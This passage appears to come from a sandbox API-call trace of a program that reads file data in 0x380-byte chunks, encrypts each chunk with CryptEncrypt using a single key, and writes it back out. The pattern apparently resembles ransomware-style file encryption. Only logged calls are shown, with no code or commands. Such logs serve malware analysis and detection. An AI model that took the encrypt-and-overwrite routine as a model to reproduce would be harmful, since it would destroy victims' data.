hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.815] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.831] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.831] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.832] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.836] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.837] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 